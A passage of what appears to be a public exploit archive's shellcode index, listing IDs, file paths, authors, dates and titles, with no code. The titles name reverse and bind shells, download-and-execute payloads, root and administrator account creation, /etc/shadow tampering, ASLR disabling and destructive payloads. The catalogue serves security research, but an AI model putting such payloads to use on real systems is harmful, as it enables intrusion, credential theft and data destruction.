228 13470 shellcodes/netbsd_x86/13470.c NetBSD/x86 - Kill All Processes Shellcode (23 bytes) 2009-06-18 anonymous shellcode netbsd_x86
229 13471 shellcodes/netbsd_x86/13471.c NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
230 13472 shellcodes/netbsd_x86/13472.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
231 13473 shellcodes/netbsd_x86/13473.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
232 13474 shellcodes/netbsd_x86/13474.txt NetBSD/x86 - execve /bin/sh Shellcode (68 bytes) NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes) 2004-09-26 humble shellcode netbsd_x86
233 13475 shellcodes/openbsd_x86/13475.c OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) 2006-05-01 hophet shellcode openbsd_x86
234 13476 shellcodes/openbsd_x86/13476.c OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes) 2004-09-26 Sinan Eren shellcode openbsd_x86
235 13477 shellcodes/openbsd_x86/13477.c OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes) 2004-09-26 anonymous shellcode openbsd_x86
236 13478 shellcodes/osx_ppc/13478.c OSX/PPC - sync() + reboot() Shellcode (32 bytes) 2006-05-01 hophet shellcode osx_ppc
237 13479 shellcodes/osx_ppc/13479.c OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes) 2006-05-01 hophet shellcode osx_ppc
238 13480 shellcodes/osx_ppc/13480.c OSX/PPC - Add Root User (r00t) Shellcode (219 bytes) 2004-09-26 B-r00t shellcode osx_ppc
239 13481 shellcodes/osx_ppc/13481.c OSX/PPC - execve /bin/sh Shellcode (72 bytes) OSX/PPC - execve(/bin/sh) Shellcode (72 bytes) 2004-09-26 B-r00t shellcode osx_ppc
240 13482 shellcodes/osx_ppc/13482.c OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes) 2004-09-26 B-r00t shellcode osx_ppc
241 13483 shellcodes/osx_ppc/13483.c OSX/PPC - Reboot Shellcode (28 bytes) 2004-09-26 B-r00t shellcode osx_ppc
242 13484 shellcodes/osx_ppc/13484.c OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes) OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes) 2004-09-26 B-r00t shellcode osx_ppc
243 13485 shellcodes/osx_ppc/13485.c OSX/PPC - Create /tmp/suid Shellcode (122 bytes) 2004-09-26 B-r00t shellcode osx_ppc
244 13486 shellcodes/osx_ppc/13486.c OSX/PPC - Simple write() Shellcode (75 bytes) 2004-09-26 B-r00t shellcode osx_ppc
245 13487 shellcodes/osx_ppc/13487.c OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes) OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes) 2004-09-26 B-r00t shellcode osx_ppc
246 13488 shellcodes/sco_x86/13488.c SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes) 2005-11-30 p. minervini shellcode sco_x86
247 13489 shellcodes/solaris_sparc/13489.c shellcodes/solaris_mips/13489.c Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes) Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes) 2006-11-21 xort shellcode solaris_sparc solaris_mips
248 13490 shellcodes/solaris_sparc/13490.c Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes) 2006-10-21 bunker shellcode solaris_sparc
249 13491 shellcodes/generator/13491.c Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator) Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator) 2006-07-21 xort shellcode generator
250 13492 shellcodes/solaris_sparc/13492.c Solaris/SPARC - setreuid + execve Shellcode (56 bytes) Solaris/SPARC - setreuid + execve() Shellcode (56 bytes) 2005-11-20 lhall shellcode solaris_sparc
251 13493 shellcodes/solaris_sparc/13493.c Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes) 2005-11-20 lhall shellcode solaris_sparc
252 13494 shellcodes/solaris_sparc/13494.txt Solaris/SPARC - execve /bin/sh Shellcode (52 bytes) Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes) 2004-09-26 LSD-PLaNET shellcode solaris_sparc
253 13495 shellcodes/solaris_sparc/13495.c Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) 2004-09-26 Claes Nyberg Claes M. Nyberg shellcode solaris_sparc
254 13496 shellcodes/solaris_sparc/13496.c Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) 2004-09-26 Claes Nyberg Claes M. Nyberg shellcode solaris_sparc
255 13497 shellcodes/solaris_sparc/13497.txt Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes) 2000-11-19 dopesquad.net shellcode solaris_sparc
256 13498 shellcodes/generator/13498.php Solaris/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-16 Jonathan Salwan shellcode generator
257 13499 shellcodes/solaris_x86/13499.c Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes) Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes) 2008-12-02 sm4x shellcode solaris_x86
258 13500 shellcodes/solaris_x86/13500.c Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes) 2008-12-02 sm4x shellcode solaris_x86
259 13501 shellcodes/solaris_x86/13501.txt Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes) Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) 2004-09-26 anonymous shellcode solaris_x86
260 13502 shellcodes/solaris_x86/13502.txt Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes) Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) 2004-09-26 anonymous shellcode solaris_x86
261 13503 shellcodes/unixware/13503.txt UnixWare - execve /bin/sh Shellcode (95 bytes) UnixWare - execve(/bin/sh) Shellcode (95 bytes) 2004-09-26 K2 shellcode unixware
262 13504 shellcodes/windows_x86/13504.asm Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode 2009-07-27 Skylined shellcode windows_x86
263 13505 shellcodes/windows_x86/13505.c Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes) 2009-07-17 Stack shellcode windows_x86
264 13507 shellcodes/windows_x86/13507.txt Windows x86 - Egg Omelet SEH Shellcode 2009-03-16 Skylined shellcode windows_x86
292 13549 shellcodes/linux_x86/13549.c Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes) 2009-12-04 ka0x shellcode linux_x86
293 13550 shellcodes/linux_x86/13550.c Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes) 2009-12-04 ka0x shellcode linux_x86
294 13551 shellcodes/linux_x86/13551.c Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes) 2009-12-04 ka0x shellcode linux_x86
295 13553 shellcodes/linux_x86/13553.c Linux/x86 - execve Shellcode (51 bytes) Linux/x86 - execve() Shellcode (51 bytes) 2009-12-04 fl0 fl0w shellcode linux_x86
296 13560 shellcodes/windows/13560.txt Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes) 2009-12-14 anonymous shellcode windows
297 13563 shellcodes/linux_x86/13563.asm Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) 2010-01-15 root@thegibson shellcode linux_x86
298 13565 shellcodes/windows_x86/13565.asm Windows XP SP3 x86 - ShellExecuteA Shellcode 2009-12-19 sinn3r shellcode windows_x86
303 13572 shellcodes/linux_x86/13572.c Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes) 2009-12-24 sandman shellcode linux_x86
304 13574 shellcodes/windows_x86/13574.c Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes) 2009-12-28 AnTi SeCuRe shellcode windows_x86
305 13576 shellcodes/linux_x86/13576.asm Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes) 2010-01-16 root@thegibson shellcode linux_x86
306 13577 shellcodes/linux_x86/13577.txt Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes) Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes) 2009-12-30 root@thegibson shellcode linux_x86
307 13578 shellcodes/linux_x86/13578.txt Linux/x86 - Fork Bomb Shellcode (6 bytes) (1) 2009-12-30 root@thegibson shellcode linux_x86
308 13579 shellcodes/linux_x86/13579.c Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes) 2009-12-31 sandman shellcode linux_x86
309 13581 shellcodes/windows/13581.txt Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes) 2010-01-03 Aodrulez shellcode windows
310 13582 shellcodes/windows/13582.txt Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes) 2010-01-03 Aodrulez shellcode windows
311 13586 shellcodes/linux_x86/13586.txt Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) 2010-01-08 root@thegibson shellcode linux_x86
312 13595 shellcodes/windows_x86/13595.c Windows XP SP2 x86 (French) - calc Shellcode (19 bytes) 2010-01-20 SkuLL-HackeR shellcode windows_x86
313 13599 shellcodes/linux_x86/13599.txt Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes) Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
314 13600 shellcodes/linux_x86/13600.txt Linux/x86 - ip6tables -F Shellcode (47 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
315 13601 shellcodes/linux_x86/13601.txt Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
316 13602 shellcodes/linux_x86/13602.txt Linux/i686 - pacman -R <package> Shellcode (59 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
317 13609 shellcodes/linux_x86/13609.c Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes) Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes) 2010-02-09 fb1h2s shellcode linux_x86
318 13614 shellcodes/windows_x86/13614.c Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
319 13615 shellcodes/windows_x86/13615.c Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
320 13627 shellcodes/linux_x86/13627.c Linux/x86 - execve /bin/sh Shellcode (8 bytes) Linux/x86 - execve(/bin/sh) Shellcode (8 bytes) 2010-02-23 JungHoon Shin shellcode linux_x86
321 13628 shellcodes/linux_x86/13628.c Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2) 2010-02-27 ipv shellcode linux_x86
322 13630 shellcodes/windows_x86/13630.c Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes) 2010-02-28 Hazem mofeed shellcode windows_x86
323 13631 shellcodes/windows_x86/13631.c Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes) 2010-03-01 Hazem mofeed shellcode windows_x86
324 13632 shellcodes/linux_x86/13632.c Linux/x86 - Disable modsecurity Shellcode (64 bytes) 2010-03-04 sekfault shellcode linux_x86
332 13649 shellcodes/windows/13649.txt Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode 2010-03-27 Alexey Sintsov shellcode windows
333 13661 shellcodes/linux_x86/13661.txt Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode 2010-04-02 anonymous shellcode linux_x86
334 13669 shellcodes/linux_x86/13669.c Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) 2010-04-14 Magnefikko shellcode linux_x86
335 13670 shellcodes/linux_x86-64/13670.c shellcodes/linux_x86/13670.c Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2) 2010-04-14 Magnefikko shellcode linux_x86-64 linux_x86
336 13671 shellcodes/linux_x86/13671.c Linux/x86 - DoS Badger Game Shellcode (6 bytes) 2010-04-14 Magnefikko shellcode linux_x86
337 13673 shellcodes/linux_x86/13673.c Linux/x86 - DoS SLoc Shellcode (55 bytes) 2010-04-14 Magnefikko shellcode linux_x86
338 13675 shellcodes/linux_x86/13675.c Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes) 2010-04-17 Magnefikko shellcode linux_x86
339 13676 shellcodes/linux_x86/13676.c Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes) 2010-04-18 sm0k shellcode linux_x86
340 13677 shellcodes/linux_x86/13677.c Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes) 2010-04-19 Magnefikko shellcode linux_x86
341 13679 shellcodes/generator/13679.py Linux - write() + exit(0) Shellcode (Generator) 2010-04-20 Stoke shellcode generator
342 13680 shellcodes/linux_x86/13680.c Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes) Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes) 2010-04-21 Jonathan Salwan shellcode linux_x86
343 13681 shellcodes/linux_x86/13681.c Linux/x86 - Fork Bomb Shellcode (6 bytes) (2) 2010-04-21 Jonathan Salwan shellcode linux_x86
344 13682 shellcodes/linux_x86/13682.c Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes) 2010-04-22 Magnefikko shellcode linux_x86
345 13688 shellcodes/linux_x86-64/13688.c Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes) 2010-04-25 zbt shellcode linux_x86-64
346 13691 shellcodes/linux_x86-64/13691.c Linux/x86-64 - execve /bin/sh Shellcode (30 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) 2010-04-25 zbt shellcode linux_x86-64
347 13692 shellcodes/linux_x86/13692.c Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes) 2010-04-25 condis shellcode linux_x86
348 13697 shellcodes/linux_x86/13697.c Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes) 2010-05-04 Jonathan Salwan shellcode linux_x86
349 13698 shellcodes/linux_x86/13698.c Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes) 2010-05-05 Jonathan Salwan shellcode linux_x86
350 13699 shellcodes/windows_x86/13699.txt Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode 2010-05-10 Crack_MaN shellcode windows_x86
351 13702 shellcodes/linux_x86/13702.c Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes) 2010-05-17 Jonathan Salwan shellcode linux_x86
352 13703 shellcodes/linux_x86/13703.txt Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
358 13715 shellcodes/linux_x86/13715.c Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes) 2010-05-27 agix shellcode linux_x86
359 13716 shellcodes/linux_x86/13716.c Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes) 2010-05-27 agix shellcode linux_x86
360 13719 shellcodes/windows_x86-64/13719.txt Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes) 2010-05-28 agix shellcode windows_x86-64
361 13722 shellcodes/linux_x86/13722.c Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes) Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes) 2010-05-31 antrhacks shellcode linux_x86
362 13723 shellcodes/linux_x86/13723.c Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
363 13724 shellcodes/linux_x86/13724.c Linux/x86 - Kill All Running Process Shellcode (11 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
364 13725 shellcodes/linux_x86/13725.txt Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
365 13726 shellcodes/linux_x86/13726.txt Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
366 13728 shellcodes/linux_x86/13728.c Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes) Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes) 2010-06-01 gunslinger_ shellcode linux_x86
367 13729 shellcodes/windows_x86-64/13729.txt Windows 7 x64 - cmd Shellcode (61 bytes) 2010-06-01 agix shellcode windows_x86-64
368 13730 shellcodes/linux_x86/13730.c Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes) 2010-06-02 gunslinger_ shellcode linux_x86
369 13731 shellcodes/linux_x86/13731.c Linux/x86 - Hard Reboot Shellcode (29 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
382 14116 shellcodes/arm/14116.txt Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes) 2010-06-29 Jonathan Salwan shellcode arm
383 14052 shellcodes/windows/14052.c Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes) 2010-06-25 RubberDuck shellcode windows
384 14097 shellcodes/arm/14097.c Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes) 2010-06-28 Jonathan Salwan shellcode arm
385 14119 shellcodes/linux_x86/14119.c Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes) 2010-06-29 gunslinger_ shellcode linux_x86
386 14142 shellcodes/arm/14142.c Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes) Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes) 2010-06-30 Florian Gaultier shellcode arm
387 14122 shellcodes/arm/14122.txt Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes) 2010-06-29 Florian Gaultier shellcode arm
388 14139 shellcodes/arm/14139.c Linux/ARM - Disable ASLR Security Shellcode (102 bytes) 2010-06-30 Jonathan Salwan shellcode arm
389 14190 shellcodes/arm/14190.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes) 2010-07-03 Jonathan Salwan shellcode arm
390 14216 shellcodes/linux_x86/14216.c Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes) 2010-07-05 Magnefikko shellcode linux_x86
391 14218 shellcodes/linux/14218.c Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes) Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes) 2010-07-05 gunslinger_ shellcode linux
392 14219 shellcodes/linux/14219.c Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes) 2010-07-05 gunslinger_ shellcode linux
393 14221 shellcodes/windows/14221.html Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode 2010-07-05 Alexey Sintsov shellcode windows
394 14234 shellcodes/linux/14234.c shellcodes/linux_x86/14234.c Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes) Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes) 2010-07-05 gunslinger_ shellcode linux linux_x86
395 14235 shellcodes/linux/14235.c Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes) 2010-07-05 gunslinger_ shellcode linux
396 14261 shellcodes/generator/14261.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator) 2010-07-07 Jonathan Salwan shellcode generator
397 14276 shellcodes/linux/14276.c shellcodes/linux_x86/14276.c Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes) Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes) 2010-07-08 gunslinger_ shellcode linux linux_x86
398 14288 shellcodes/windows_x86/14288.asm Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni shellcode windows_x86
399 14305 shellcodes/linux_x86-64/14305.c Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes) Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) 2010-07-09 10n1z3d shellcode linux_x86-64
400 14332 shellcodes/linux_x86/14332.c Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes) 2010-07-11 blake shellcode linux_x86
401 14691 shellcodes/linux_x86/14691.c Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes) 2010-08-19 Aodrulez shellcode linux_x86
402 14697 shellcodes/windows/14697.c Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes) 2010-08-20 Glafkos Charalambous shellcode windows
403 14795 shellcodes/bsd_x86/14795.c BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes) 2010-08-25 beosroot shellcode bsd_x86
404 14873 shellcodes/windows_x86/14873.asm Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes) 2010-09-02 dijital1 shellcode windows_x86
405 14907 shellcodes/arm/14907.c Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes) 2010-09-05 Jonathan Salwan shellcode arm
406 15063 shellcodes/windows_x86/15063.c Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) 2010-09-20 ZoRLu shellcode windows_x86
407 15116 shellcodes/windows/15116.cpp shellcodes/arm/15116.cpp Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM) Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode 2010-09-26 Celil Ünüver shellcode windows arm
408 15136 shellcodes/windows/15136.cpp Windows Mobile 6.5 TR - Phone Call Shellcode 2010-09-27 Celil Ünüver shellcode windows
409 15202 shellcodes/windows_x86/15202.c Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
410 15203 shellcodes/windows_x86/15203.c Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
413 15316 shellcodes/arm/15316.asm Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
414 15317 shellcodes/arm/15317.asm Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
415 15616 shellcodes/arm/15616.c Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes) 2010-11-25 Jonathan Salwan shellcode arm
416 15618 shellcodes/osx/15618.c OSX/Intel x86-64 - setuid shell Shellcode (51 bytes) OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) 2010-11-25 Dustin Schultz shellcode osx
417 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) 2010-12-09 Jonathan Salwan shellcode generator
418 15879 shellcodes/windows_x86/15879.txt Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode 2010-12-31 Skylined shellcode windows_x86
419 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
420 16026 shellcodes/freebsd_x86/16026.c FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes) 2011-01-21 Tosh shellcode freebsd_x86
421 16283 shellcodes/windows_x86/16283.txt Windows x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode windows_x86
422 17432 shellcodes/superh_sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode superh_sh4
423 17194 shellcodes/linux_x86/17194.txt Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode linux_x86
424 17224 shellcodes/osx/17224.s OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2011-04-29 hammackj shellcode osx
425 17323 shellcodes/windows/17323.c Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) 2011-05-25 RubberDuck shellcode windows
426 20195 shellcodes/linux_x86/20195.c Linux/x86 - Disable ASLR Security Shellcode (83 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
427 17326 shellcodes/generator/17326.rb Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit) 2011-05-26 Alexey Sintsov shellcode generator
429 17439 shellcodes/superh_sh4/17439.c Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) 2011-06-23 Jonathan Salwan shellcode superh_sh4
430 17545 shellcodes/windows_x86/17545.txt Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) 2011-07-18 KaHPeSeSe shellcode windows_x86
431 17559 shellcodes/linux_x86/17559.c Linux/x86 - Egghunter Null-Free Shellcode (29 bytes) 2011-07-21 Ali Raheem shellcode linux_x86
432 17564 shellcodes/osx/17564.asm OSX - Universal ROP + Reverse TCP Shell Shellcode OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode 2011-07-24 pa_kt shellcode osx
433 17940 shellcodes/linux_mips/17940.c Linux/MIPS - execve /bin/sh Shellcode (52 bytes) Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes) 2011-10-07 entropy shellcode linux_mips
434 17996 shellcodes/generator/17996.c Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator) 2011-10-18 entropy shellcode generator
435 18154 shellcodes/superh_sh4/18154.c Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes) 2011-11-24 Jonathan Salwan shellcode superh_sh4
436 18162 shellcodes/linux_mips/18162.c Linux/MIPS - execve /bin/sh Shellcode (48 bytes) Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes) 2011-11-27 rigan shellcode linux_mips
437 18163 shellcodes/linux_mips/18163.c Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes) 2011-11-27 rigan shellcode linux_mips
438 18197 shellcodes/linux_x86-64/18197.c Linux/x86-64 - execve /bin/sh Shellcode (52 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes) 2011-12-03 X-h4ck shellcode linux_x86-64
439 18226 shellcodes/linux_mips/18226.c Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes) 2011-12-10 rigan shellcode linux_mips
440 18227 shellcodes/linux_mips/18227.c Linux/MIPS - reboot() Shellcode (32 bytes) 2011-12-10 rigan shellcode linux_mips
441 18294 shellcodes/linux_x86/18294.c Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode 2011-12-31 pentesters.ir shellcode linux_x86
